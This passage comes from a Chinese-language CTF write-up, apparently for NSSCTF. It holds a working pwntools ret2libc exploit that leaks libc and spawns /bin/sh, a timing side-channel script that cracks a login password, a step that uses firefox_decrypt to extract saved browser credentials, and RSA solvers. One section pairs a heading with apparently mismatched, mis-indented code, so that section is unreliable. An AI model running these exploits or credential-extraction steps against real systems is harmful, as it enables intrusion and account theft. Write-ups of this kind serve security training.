\u7b97\u5f97\u5230\u3002<\/span><\/p>\r\n
      exp:<\/span><\/p>\r\n
      from pwn import *<\/span>
      p = remote(\"node2.anna.nssctf.cn\", 28759)<\/span>
      elf = ELF(\".\/attachment\")<\/span>
      libc = ELF(\".\/libc.so.6\")<\/span>
      pop_rdi = 0x400D73<\/span>
      p.sendafter(b'money', b'3')<\/span>
      p.sendafter(b'money?', b'1000')<\/span>
      p.sendafter(b'money', b'7')<\/span>
      p.sendafter(b'exchange?', b'1000')<\/span>
      p.sendafter(b'money', b'5')<\/span>
      payload = b'a' * 72 + p64(pop_rdi) + p64(elf.got[\"puts\"]) + p64(elf.sym[\"puts\"]) + p64(0x400600)<\/span>
      p.send(payload)<\/span>
      libc.address = u64(p.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00')) - libc.sym[\"puts\"]<\/span>
      print(hex(libc.address))<\/span>
      p.sendafter(b'money', b'3')<\/span>
      p.sendafter(b'money?', b'1000')<\/span>
      p.sendafter(b'money', b'7')<\/span>
      p.sendafter(b'exchange?', b'1000')<\/span>
      p.sendafter(b'money', b'5')<\/span>
      payload = b'a' * 72 + p64(pop_rdi) + p64(next(libc.search(b'\/bin\/sh'))) + p64(libc.sym[\"system\"])<\/span>
      p.send(payload)<\/span>
      p.interactive()<\/span><\/pre>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      MISC<\/span><\/h2>\r\n
      mybrave<\/span><\/h3>\r\n
      \u4e0d\u662f\u4f2a\u52a0\u5bc6\uff0c\u6ca1\u6709\u6570\u636e\u6d41\uff0ccrc\u4e0d\u51fa\u6765\uff0c\u6b63\u5e38\u5bc6\u7801\u7206\u7834\u4e5f\u4e0d\u884c\uff0c16\u8fdb\u5236\u91cc\u4e5f\u6ca1\u85cf\u4e1c\u897f\uff0c\u7136\u540e\u91cc\u9762\u662f\u4e00\u4e2apng\uff0c\u6587\u4ef6\u5934\u5df2\u77e5\uff08bkcrack\u9700\u8981\u77e5\u9053\u81f3\u5c11\u8fde\u7eed8\u4e2a\u5df2\u77e5\u5b57\u8282\uff09<\/span><\/p>\r\n
      \u60f3\u5230\u660e\u6587\u52a0\u5bc6<\/span><\/p>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      \u5bc6\u94a597d30dcc173b15a86e0e7455<\/span><\/p>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      \u6062\u590d\u56fe\u7247\"a\"<\/span><\/p>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      \u6587\u4ef6\u5c3ebase64\u89e3\u5bc6<\/span><\/p>\r\n
      NSSCTF{I'm_Wh1sp3riNg_OuR_Lu11abY_f0r_Y0u_to_CoMe_B4ck_Home}<\/span><\/pre>\r\n
      mycode<\/span><\/h3>\r\n
      a+b<\/code> \u7684\u5b57\u5178\u5e8f\u5c0f\u4e8e b+a<\/code>\uff0c\u5219 a<\/code> \u6392\u5728 b<\/code> \u524d\u9762<\/span><\/p>\r\n
      exp:<\/span><\/p>\r\n
      import socket<\/span>
      from functools import cmp_to_key<\/span>
      def compare(a, b):<\/span>
        if a + b < b + a:<\/span>
      \u2022<\/span> \u00a0  return -1<\/span>
        else:<\/span>
      \u2022<\/span> \u00a0  return 1<\/span>
      def get_smallest_number(nums):<\/span>
        sorted_nums = sorted(nums, key=cmp_to_key(compare))<\/span>
        concatenated = ''.join(sorted_nums)<\/span>
        concatenated = concatenated.lstrip('0')<\/span>
        return concatenated if concatenated else '0'<\/span>
      def main():<\/span>
        host = 'node2.anna.nssctf.cn'<\/span>
        port = 28206<\/span>
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:<\/span>
      \u2022<\/span> \u00a0  s.connect((host, port))<\/span>
      \u2022<\/span> \u00a0  buffer = ''<\/span>
      \u2022<\/span> \u00a0  while True:<\/span>
      \u2022<\/span> \u00a0 \u00a0  data = s.recv(4096).decode('utf-8', errors='ignore')<\/span>
      \u2022<\/span> \u00a0 \u00a0  if not data:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  break<\/span>
      \u2022<\/span> \u00a0 \u00a0  buffer += data<\/span>
      \u2022<\/span> \u00a0 \u00a0  while True:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  idx = buffer.find('\\n')<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  if idx == -1:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  break<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  line = buffer[:idx]<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  buffer = buffer[idx+1:]<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  if line.startswith('Numbers:'):<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  nums_str = line[len('Numbers: '):].strip()<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  nums = nums_str.split()<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  smallest = get_smallest_number(nums)<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  s.send(f\"{smallest}\\n\".encode())<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  print(f\"Sent: {smallest}\")  # \u53ef\u9009\uff0c\u7528\u4e8e\u8c03\u8bd5<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  elif line.startswith('NSSCTF'):<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  return line.strip()<\/span>
      if __name__ == \"__main__\":<\/span>
        result = main()<\/span>
        if result:<\/span>
      \u2022<\/span> \u00a0  print(result)<\/span><\/pre>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      myleak<\/span><\/h3>\r\n
      \u5148\u662f\u6839\u636e\u9898\u76ee\u63cf\u8ff0 \u7528robots\u534f\u8bae<\/span><\/p>\r\n
      Disallow: \/webinfo.md<\/span><\/pre>\r\n
      \u91cc\u9762\u662f\u6e90\u7801https:\/\/github.com\/webadmin-src\/webapp-src<\/a><\/span><\/p>\r\n
      from flask import Flask, render_template, request, redirect, url_for, session<\/span>
      from flask_session import Session<\/span>
      import time<\/span>
      import random<\/span>
      import hashlib<\/span>
      app = Flask(__name__)<\/span>
      app.secret_key = hashlib.sha256(str(time.time()).encode()).hexdigest()<\/span>
      app.config['SESSION_TYPE'] = 'filesystem'<\/span>
      app.config['SESSION_FILE_DIR'] = '.\/flask_session'<\/span>
      Session(app)\\# \u7528\u6237\u914d\u7f6e<\/span>
      CORRECT_PASSWORD = ''  # \u767b\u5f55\u5bc6\u7801<\/span>
      VERIFICATION_CODE = '' # \u9a8c\u8bc1\u7801<\/span>
      ADJECTIVES = ['Happy', 'Clever', 'Swift', 'Brave', 'Gentle', 'Honest', 'Lucky', 'Wise']<\/span>
      NOUNS = ['Panda', 'Tiger', 'Eagle', 'Dolphin', 'Phoenix', 'Wolf', 'Lion', 'Dragon']<\/span>
      def generate_random_username():<\/span>
        \"\"\"\u751f\u6210\u968f\u673a\u7528\u6237\u540d \u683c\u5f0f\uff1a\u5f62\u5bb9\u8bcd_\u540d\u8bcd_\u6570\u5b57\"\"\"<\/span>
        return f\"{random.choice(ADJECTIVES)}_{random.choice(NOUNS)}_{random.randint(100, 999)}\"<\/span>
      @app.route('\/')<\/span>
      def home():<\/span>
        return redirect(url_for('login'))<\/span>
      @app.route('\/login', methods=['GET', 'POST'])<\/span>
      def login():<\/span>
        if request.method == 'POST':<\/span>
      \u2022<\/span> \u00a0  PASSWORD = request.form.get('password')<\/span>
      \u2022<\/span> \u00a0  if len(PASSWORD) != len(CORRECT_PASSWORD):<\/span>
      \u2022<\/span> \u00a0 \u00a0  return render_template('login.html', error='\u5bc6\u7801\u957f\u5ea6\u9519\u8bef')<\/span>
      \u2022<\/span> \u00a0  for i in range(len(PASSWORD)):<\/span>
      \u2022<\/span> \u00a0 \u00a0  if PASSWORD[i] != CORRECT_PASSWORD[i]:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  return render_template('login.html', error='\u5bc6\u7801\u9519\u8bef')<\/span>
      \u2022<\/span> \u00a0 \u00a0  time.sleep(0.1)<\/span>
      \u2022<\/span> \u00a0  session['logged_in'] = True<\/span>
      \u2022<\/span> \u00a0  session['username'] = generate_random_username()<\/span>
      \u2022<\/span> \u00a0  return redirect(url_for('index'))<\/span>
        return render_template('login.html')<\/span>
      @app.route('\/index', methods=['GET', 'POST'])<\/span>
      def index():<\/span>
        if not session.get('logged_in'):<\/span>
      \u2022<\/span> \u00a0  return redirect(url_for('login')) \u00a0<\/span>
        if request.method == 'POST':<\/span>
      \u2022<\/span> \u00a0  user_code = request.form.get('code', '')<\/span>
      \u2022<\/span> \u00a0  if user_code == VERIFICATION_CODE:<\/span>
      \u2022<\/span> \u00a0 \u00a0  try:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  with open('\/flag', 'r') as f:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0  flag = f.read().strip()<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  return render_template('index.html', flag=flag)<\/span>
      \u2022<\/span> \u00a0 \u00a0  except Exception as e:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  print(f\"\u8bfb\u53d6flag\u6587\u4ef6\u5931\u8d25: {e}\")<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  return render_template('index.html', error='\u7cfb\u7edf\u9519\u8bef\uff0c\u8bf7\u8054\u7cfb\u7cfb\u7edf\u7ba1\u7406\u5458')<\/span>
      \u2022<\/span> \u00a0  return render_template('index.html', error='\u9a8c\u8bc1\u7801\u9519\u8bef\uff0c\u8bf7\u91cd\u65b0\u8f93\u5165')<\/span>
        return render_template('index.html')<\/span>
      @app.route('\/robots.txt', methods=['GET', 'POST'])<\/span>
      def robot():<\/span>
        return send_from_directory(app.static_folder,'robots.txt')<\/span>
      @app.route('\/webinfo.md', methods=['GET', 'POST'])<\/span>
      def webinfo():<\/span>
        return send_from_directory(app.static_folder,'webinfo.md')<\/span><\/pre>\r\n
       <\/p>\r\n
      \u5148\u624b\u52a8\u63a8\u51fa\u5bc6\u7801\u957f\u5ea6\u4e3a10\uff0c\u7136\u540e\u6839\u636e\u767b\u5f55\u90e8\u5206\u7684 time.sleep(0.1) \u53ef\u4ee5\u5224\u65ad\u662f\u65f6\u95f4\u4fa7\u4fe1\u9053\u653b\u51fb<\/span><\/p>\r\n
       <\/p>\r\n
      import requests<\/span>
      import time<\/span>
      import string<\/span>
      from statistics import median<\/span>
      TARGET_URL = 'http:\/\/node2.anna.nssctf.cn:28438\/login' <\/span>
      PASSWORD_LENGTH = 10<\/span>
      TIME_PER_CHAR = 0.1<\/span>
      RETRY_COUNT = 3 <\/span>
      CHAR_SET = string.ascii_letters + string.digits + '!_@#$%^&*'<\/span>
      def measure_time(guess):<\/span>
        times = []<\/span>
        for _ in range(RETRY_COUNT):<\/span>
      \u2022<\/span> \u00a0  try:<\/span>
      \u2022<\/span> \u00a0 \u00a0  start = time.time()<\/span>
      \u2022<\/span> \u00a0 \u00a0  response = requests.post(<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  TARGET_URL,<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  data={'password': guess},<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  allow_redirects=False,<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  timeout=2<\/span>
      \u2022<\/span> \u00a0 \u00a0  )<\/span>
      \u2022<\/span> \u00a0 \u00a0  times.append(time.time() - start)<\/span>
      \u2022<\/span> \u00a0  except:<\/span>
      \u2022<\/span> \u00a0 \u00a0  continue<\/span>
        return median(times) if times else None<\/span>
      def crack_password():<\/span>
        password = [''] * PASSWORD_LENGTH<\/span>
        for position in range(PASSWORD_LENGTH):<\/span>
      \u2022<\/span> \u00a0  max_elapsed = 0<\/span>
      \u2022<\/span> \u00a0  correct_char = None<\/span>
      \u2022<\/span> \u00a0  for char in CHAR_SET: <\/span>
      \u2022<\/span> \u00a0 \u00a0  guess = ''.join(password[:position]) + char<\/span>
      \u2022<\/span> \u00a0 \u00a0  guess += 'x' * (PASSWORD_LENGTH - len(guess)) <\/span>
      \u2022<\/span> \u00a0 \u00a0  elapsed = measure_time(guess)<\/span>
      \u2022<\/span> \u00a0 \u00a0  if not elapsed:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  continue<\/span>
      \u2022<\/span> \u00a0 \u00a0  expected = TIME_PER_CHAR * (position + 1)<\/span>
      \u2022<\/span> \u00a0 \u00a0  if (abs(elapsed - expected) < 0.07) and (elapsed > max_elapsed):<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  max_elapsed = elapsed<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  correct_char = char<\/span>
      \u2022<\/span> \u00a0  if correct_char:<\/span>
      \u2022<\/span> \u00a0 \u00a0  password[position] = correct_char<\/span>
      \u2022<\/span> \u00a0 \u00a0  print(f\"[\u2713] \u4f4d\u7f6e {position} \u7834\u89e3\u6210\u529f: {''.join(password)}\")<\/span>
      \u2022<\/span> \u00a0  else:<\/span>
      \u2022<\/span> \u00a0 \u00a0  if password[position-1].isupper():<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  password[position-1] = password[position-1].lower()<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  print(f\"[!] \u56de\u9000\u91cd\u8bd5\u4f4d\u7f6e {position-1} -> {password[position-1]}\")<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  return crack_password() \u00a0 \u00a0 <\/span>
      \u2022<\/span> \u00a0 \u00a0  print(f\"[\u00d7] \u4f4d\u7f6e {position} \u7834\u89e3\u5931\u8d25\uff0c\u5f53\u524d\u8fdb\u5ea6\uff1a{''.join(password)}\")<\/span>
      \u2022<\/span> \u00a0 \u00a0  return None <\/span>
        return ''.join(password)<\/span>
      if __name__ == \"__main__\":<\/span>
        print(\"\u542f\u52a8\u589e\u5f3a\u7248\u7834\u89e3\u7a0b\u5e8f...\")<\/span>
        final_password = crack_password()<\/span>
        print(f\"\\n\u6700\u7ec8\u7ed3\u679c: {final_password or '\u7834\u89e3\u5931\u8d25'}\")<\/span><\/pre>\r\n
      \u7834\u89e3\u51fa\u6765\u5bc6\u7801\u662fsECurePAsS<\/span><\/p>\r\n
      https:\/\/github.com\/webadmin-src\/webapp-src\/activity<\/a>\u91cc\u53bb\u6bd4\u8f83\uff0c\u5f97\u5230\u90ae\u7bb1\uff0c\u7136\u540e\u5bc6\u7801\u590d\u7528\uff0c\u5f97\u5230\u8ba4\u8bc1\u7801<\/span><\/p>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      \u7136\u540e\u83b7\u5f97flag<\/span><\/p>\r\n
      mydisk-2<\/span><\/h3>\r\n
      \u4f7f\u7528firefox_decrypt\u89e3\u5bc6\u4e2a\u4eba\u4e3b\u76ee\u5f55\u4e0b\u7684.mozila\u6587\u4ef6\u5939\uff0c\u83b7\u53d6ctfshow\u7684\u8d26\u53f7\u5bc6\u7801<\/p>\r\n
      \"\"<\/h2>\r\n
      \u4f7f\u7528firefox_decrypt\u89e3\u5bc6\u4e2a\u4eba\u4e3b\u76ee\u5f55\u4e0b\u7684.mozila\u6587\u4ef6\u5939\uff0c\u83b7\u53d6ctfshow\u7684\u8d26\u53f7\u5bc6\u7801<\/p>\r\n
      \"\"<\/p>\r\n
      \u6253\u5f00etc\u76ee\u5f55\u4e0b\u7684lsb-release\u53d1\u73b0\u7248\u672c\u4fe1\u606f<\/p>\r\n
      \"\"<\/p>\r\n
      Crypto<\/span><\/h2>\r\n
      baby_factor<\/span><\/h3>\r\n
      \u7b80\u5355\u7684RSA\u89e3\u5bc6\u5229\u7528\u6b27\u62c9\u51fd\u6570\u8ba1\u7b97\u79c1\u94a5<\/span><\/p>\r\n
      exp:<\/span><\/p>\r\n
      from Crypto.Util.number import long_to_bytes<\/span>
      n = 2741832985459799195551463586200496171706401045582705736390510500694289553647578857170635209048629428396407631873312962021354740290808869502374444435394061448767702908255197762575345798570340246369827688321483639197634802985398882606068294663625992927239602442735647762662536456784313240499437659967114509197846086151042512153782486075793224874304872205720564733574010669935992016367832666397263951446340260962650378484847385424893514879629196181114844346169851383460163815147712907264437435463059397586675769959094397311450861780912636566993749356097243760640620004707428340786147078475120876426087835327094386842765660642186546472260607586011343238080538092580452700406255443887820337778505999803772196923996033929998741437250238302626841957729397241851219567703420968177784088484002831289722211924810899441563382481216744212304879717297444824808184727136770899310815544776369231934774967139834384853322157766059825736075553<\/span>
      phi = 2741832985459799195551463586200496171706401045582705736390510500694289553647578857170635209048629428396407631873312962021354740290808869502374444435394061448767702908255197762575345798570340246369827688321483639197634802985398882606068294663625992927239602442735647762662536456784313240499437659967114509197784246608456057052779643060628984335578973450260519106769911425793594847759982583376628098472390090331415895352869275325656949958242181688663465437185437198392460569653734315961071709533645370007008616755547195108861900432818710027794402838336405197750190466425895582236209479543326147804766393022786785337752319686125574507066082357748118175068545756301823381723776525427724798780890160482013759497102382173931716030992837059880049832065500252713739288235410544982532170147652055063681116147027591678349638753796122845041417275362394757384204924094885233281257928031484806977974575497621444483701792085077113227851520<\/span>
      c = 2675023626005191241628571734421094007494866451142251352071850033504791090546156004348738217761733467156596330653396106482342801412567035848069931148880296036606611571818493841795682186933874790388789734748415540102210757974884805905578650801916130709273985096229857987312816790471330181166965876955546627327549473645830218664078284830699777113214559053294592015697007540297033755845037866295098660371843447432672454589238297647906075964139778749351627739005675106752803394387612753005638224496040203274119150075266870378506841838513636541340104864561937527329845541975189814018246183215952285198950920021711141273569490277643382722047159198943471946774301837440950402563578645113393610924438585345876355654972759318203702572517614743063464534582417760958462550905093489838646250677941813170355212088529993225869303917882372480469839803533981671743959732373159808299457374754090436951368378994871937358645247263240789585351233<\/span>
      e = 65537\\# \u8ba1\u7b97\u79c1\u94a5d<\/span>
      d = pow(e, -1, phi)\\# \u89e3\u5bc6\u5f97\u5230\u660e\u6587<\/span>
      m = pow(c, d, n)\\# \u8f6c\u6362\u4e3a\u5b57\u8282<\/span>
      flag = long_to_bytes(m)<\/span>
      print(flag.decode())<\/span><\/pre>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      babysignin<\/span><\/h3>\r\n
      \u5f53RSA\u7684\u52a0\u5bc6\u6307\u6570e=4\u4e14\u660e\u6587m\u8f83\u5c0f\u65f6\uff0cm\u2074\u53ef\u80fd\u5c0f\u4e8e\u6a21\u6570n\uff0c\u6b64\u65f6\u5bc6\u6587c=m\u2074\u672a\u53d6\u6a21\uff0c\u76f4\u63a5\u5bf9c\u5f00\u56db\u6b21\u65b9\u5373\u53ef\u8fd8\u539f\u660e\u6587\u3002\u82e5m\u2074\u2265n\uff0c\u5219\u9700\u5206\u89e3n\u540e\u5728\u6a21p\u548c\u6a21q\u4e0b\u5206\u522b\u6c42\u56db\u6b21\u6839\uff0c\u518d\u901a\u8fc7\u4e2d\u56fd\u5269\u4f59\u5b9a\u7406\u7ec4\u5408\u89e3\u3002<\/span><\/p>\r\n
      exp\uff1a<\/span><\/p>\r\n
      from Crypto.Util.number import long_to_bytes<\/span>
      import gmpy2<\/span>
      p = 182756071972245688517047475576147877841<\/span>
      q = 305364532854935080710443995362714630091<\/span>
      n = p * q<\/span>
      c = 14745090428909283741632702934793176175157287000845660394920203837824364163635<\/span>
      def crt(a_list, m_list):<\/span>
        \"\"\"\u4e2d\u56fd\u5269\u4f59\u5b9a\u7406\u5b9e\u73b0\"\"\"<\/span>
        M = 1<\/span>
        for m in m_list:<\/span>
      \u2022<\/span> \u00a0  M *= m<\/span>
        x = 0<\/span>
        for a, m in zip(a_list, m_list):<\/span>
      \u2022<\/span> \u00a0  Mi = M \/\/ m<\/span>
      \u2022<\/span> \u00a0  inv = gmpy2.invert(Mi, m)<\/span>
      \u2022<\/span> \u00a0  x = (x + a * Mi * inv) % M<\/span>
        return x<\/span>
      def tonelli_shanks(n, p):<\/span>
        \"\"\"Tonelli-Shanks\u7b97\u6cd5\u8ba1\u7b97\u6a21\u7d20\u6570\u5e73\u65b9\u6839 x^2 \u2261 n mod p\"\"\"<\/span>
        if pow(n, (p-1)\/\/2, p) != 1:<\/span>
      \u2022<\/span> \u00a0  return []<\/span>
        if p % 4 == 3:<\/span>
      \u2022<\/span> \u00a0  x = pow(n, (p+1)\/\/4, p)<\/span>
      \u2022<\/span> \u00a0  return [x, (-x) % p]<\/span>
        Q = p - 1<\/span>
        S = 0<\/span>
        while Q % 2 == 0:<\/span>
      \u2022<\/span> \u00a0  Q \/\/= 2<\/span>
      \u2022<\/span> \u00a0  S += 1<\/span>
        z = 2<\/span>
        while pow(z, (p-1)\/\/2, p) != p-1:<\/span>
      \u2022<\/span> \u00a0  z += 1<\/span>
        c = pow(z, Q, p)<\/span>
        x = pow(n, (Q+1)\/\/2, p)<\/span>
        t = pow(n, Q, p)<\/span>
        m = S<\/span>
        while t != 1:<\/span>
      \u2022<\/span> \u00a0  tmp = t<\/span>
      \u2022<\/span> \u00a0  i = 0<\/span>
      \u2022<\/span> \u00a0  while tmp != 1 and i < m:<\/span>
      \u2022<\/span> \u00a0 \u00a0  tmp = pow(tmp, 2, p)<\/span>
      \u2022<\/span> \u00a0 \u00a0  i += 1<\/span>
      \u2022<\/span> \u00a0  b = pow(c, 1 << (m - i - 1), p)<\/span>
      \u2022<\/span> \u00a0  x = (x * b) % p<\/span>
      \u2022<\/span> \u00a0  t = (t * b * b) % p<\/span>
      \u2022<\/span> \u00a0  c = (b * b) % p<\/span>
      \u2022<\/span> \u00a0  m = i<\/span>
        return [x, (-x) % p]<\/span>
      def find_quartic_roots(c_val, prime):<\/span>
        \"\"\"\u5bfb\u627ex^4 \u2261 c_val mod prime\u7684\u6240\u6709\u89e3\"\"\"<\/span>
        roots = []<\/span>
        y_roots = tonelli_shanks(c_val, prime)<\/span>
        for y in y_roots:<\/span>
      \u2022<\/span> \u00a0  x_roots = tonelli_shanks(y, prime)<\/span>
      \u2022<\/span> \u00a0  roots.extend(x_roots)<\/span>
        return list(set(roots))<\/span>
      \\# \u8ba1\u7b97\u56db\u6b21\u6839<\/span>
      roots_p = find_quartic_roots(c % p, p)<\/span>
      roots_q = find_quartic_roots(c % q, q)<\/span>
      print(f\"\u6a21p\u4e0b\u7684\u56db\u6b21\u6839\u6570\u91cf\uff1a{len(roots_p)}\")<\/span>
      print(f\"\u6a21q\u4e0b\u7684\u56db\u6b21\u6839\u6570\u91cf\uff1a{len(roots_q)}\")<\/span>
      \\# \u904d\u5386\u6240\u6709\u7ec4\u5408<\/span>
      for xp in roots_p:<\/span>
        for xq in roots_q:<\/span>
      \u2022<\/span> \u00a0  m = crt([xp, xq], [p, q])<\/span>
      \u2022<\/span> \u00a0  flag = long_to_bytes(m)<\/span>
      \u2022<\/span> \u00a0  if flag.startswith(b'NSSCTF{'):<\/span>
      \u2022<\/span> \u00a0 \u00a0  print(\"Flag:\", flag.decode())<\/span>
      \u2022<\/span> \u00a0 \u00a0  exit()<\/span>
      print(\"\u672a\u627e\u5230\u6709\u6548Flag\")<\/span><\/pre>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
      EZ_Fermat<\/span><\/h3>\r\n
      \u9898\u76ee\u662f\u5173\u4e8eRSA\u52a0\u5bc6\u7684,\u8981\u6c42\u4ece\u7ed9\u51fa\u7684n,e,c,f,w\u8fd9\u51e0\u4e2a\u53c2\u6570\u4e2d\u6062\u590d\u51fa\u660e\u6587\uff0c\u4e5f\u5c31\u662fflag<\/span><\/p>\r\n
      exp\u601d\u8def\uff1a<\/span><\/p>\r\n
      \u8ba1\u7b97gcd(w-1, n)\uff0c\u7531\u4e8ew \u2261 1 mod p\uff0cw-1\u662fp\u7684\u500d\u6570\uff0c\u800cn\u4e5f\u662fp\u7684\u500d\u6570\u3002\u901a\u8fc7\u6700\u5927\u516c\u7ea6\u6570\u5206\u89e3n<\/span> \u89e3\u5bc6RSA\uff1a\u4f7f\u7528\u5f97\u5230\u7684p\u548cq\u8ba1\u7b97\u79c1\u94a5d\uff0c\u89e3\u5bc6\u5bc6\u6587c<\/span><\/p>\r\n
      DATA1 = [<\/span>
       \u00a0  0x26, 0x27, 0x24, 0x25, 0x2A, 0x2B, 0x28, 0x00,<\/span>
       \u00a0  0x2E, 0x2F, 0x2C, 0x2D, 0x32, 0x33, 0x30, 0x00,<\/span>
       \u00a0  0x36, 0x37, 0x34, 0x35, 0x3A, 0x3B, 0x38, 0x39,<\/span>
       \u00a0  0x3E, 0x3F, 0x3C, 0x3D, 0x3F, 0x27, 0x34, 0x11<\/span>
      ]<\/span>
      DATA2 = [<\/span>
       \u00a0  0x69, 0x77, 0x77, 0x66, 0x73, 0x72, 0x4F, 0x46,<\/span>
       \u00a0  0x03, 0x47, 0x6F, 0x79, 0x07, 0x41, 0x13, 0x47,<\/span>
       \u00a0  0x5E, 0x67, 0x5F, 0x09, 0x0F, 0x58, 0x63, 0x7D,<\/span>
       \u00a0  0x5F, 0x77, 0x68, 0x35, 0x62, 0x0D, 0x0D, 0x50<\/span>
      ]<\/span>
      def apply_do1(data):<\/span>
       \u00a0  # \u6a21\u62df DO1 \u7684\u4ea4\u6362\u8fc7\u7a0b<\/span>
      \u2022<\/span> \u00a0  swaps = []<\/span>
      \u2022<\/span> \u00a0  for i in range(8):<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  si = i * 4<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  di = si + 4<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  if di >= 28:<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  di -= 28<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  swaps.append((si, di))<\/span>
       \u00a0  # \u6267\u884c\u4ea4\u6362<\/span>
      \u2022<\/span> \u00a0  for si, di in swaps:<\/span>
       \u00a0 \u00a0 \u00a0  # \u4ea4\u6362 4 \u5b57\u8282\u5757<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  block_si = data[si:si + 4].copy()<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  block_di = data[di:di + 4].copy()<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  data[si:si + 4] = block_di<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  data[di:di + 4] = block_si<\/span>
      \u2022<\/span> \u00a0  return data<\/span>
      def decrypt_flag(data1_modified, data2):<\/span>
       \u00a0  flag = []<\/span>
       \u00a0  for i in range(8):<\/span>
       \u00a0 \u00a0 \u00a0  di = i * 4<\/span>
       \u00a0 \u00a0 \u00a0  # \u83b7\u53d6 DATA1 \u4e2d\u5bf9\u5e94\u7684\u56db\u4e2a\u5f02\u6216\u5b57\u8282<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  d1 = data1_modified[di + 1]<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  d2 = data1_modified[di + 2]<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  d3 = data1_modified[di + 3]<\/span>
       \u00a0 \u00a0 \u00a0  # \u5f02\u6216\u6a21\u677f\uff1ad1, d2, d2, d3<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  xor_pattern = [d1, d2, d2, d3]<\/span>
       \u00a0 \u00a0 \u00a0  # \u5904\u7406 DATA2 \u7684\u56db\u4e2a\u5b57\u8282<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  block = data2[i * 4: (i + 1) * 4]<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  decrypted = [block[j] ^ xor_pattern[j] for j in range(4)]<\/span>
      \u2022<\/span> \u00a0 \u00a0 \u00a0  flag.extend(decrypted)<\/span>
       \u00a0  # \u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32<\/span>
      \u2022<\/span> \u00a0  return bytes(flag).decode('latin-1', errors='ignore')<\/span>
      \u2022<\/span> \u00a0  if __name__ == \"__main__\":<\/span>
       \u00a0  # \u521b\u5efa DATA1 \u7684\u526f\u672c\u5e76\u8fdb\u884c\u4ea4\u6362\uff08\u6a21\u62df\u52a0\u5bc6\u524d\u7684\u5904\u7406\uff09<\/span>
      \u2022<\/span> \u00a0  data1_modified = DATA1.copy()<\/span>
      \u2022<\/span> \u00a0  apply_do1(data1_modified)<\/span>
      # \u89e3\u5bc6\u5f97\u5230 flag<\/span>
      flag = decrypt_flag(data1_modified, DATA2)<\/span>
      print(\"Flag:\", flag)<\/span><\/pre>\r\n
      MIMT_RSA<\/h3>\r\n
      \u57fa\u4e8eRSA\uff0c\u9700\u8981\u4ece\u7ed9\u5b9a\u7684\u5bc6\u6587ck\u4e2d\u6062\u590d\u51fa36\u4f4d\u7684\u5408\u6570KEY\u751f\u6210flag\u3002<\/p>\r\n
      1.ck = KEY^e mod n\uff0c\u5176\u4e2de=65537\uff0cn\u4e3aRSA\u6a21\u6570\u3002<\/p>\r\n
